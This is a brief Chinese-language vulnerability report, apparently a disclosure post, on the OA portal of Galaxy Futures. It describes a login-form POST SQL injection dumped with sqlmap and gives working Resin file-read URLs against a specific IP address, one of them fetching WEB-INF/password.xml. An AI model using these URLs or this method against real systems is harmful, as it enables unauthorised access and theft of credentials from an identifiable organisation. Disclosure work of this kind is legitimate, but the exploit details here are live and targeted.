站点地址:
银河期货信息门户,即OA
我是从官网上跳转过来的
说一说问题:首先是sql注射,该系统的登录模块存在登录框post注入
登录抓包
放入sqlmap
1000余张表,望山跑死马,点到为止
问题2#任意文件读取-resin
http://101.231.52.2:8888/resin-doc/viewfile/?file=index.jsp
http://101.231.52.2:8888/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml
以上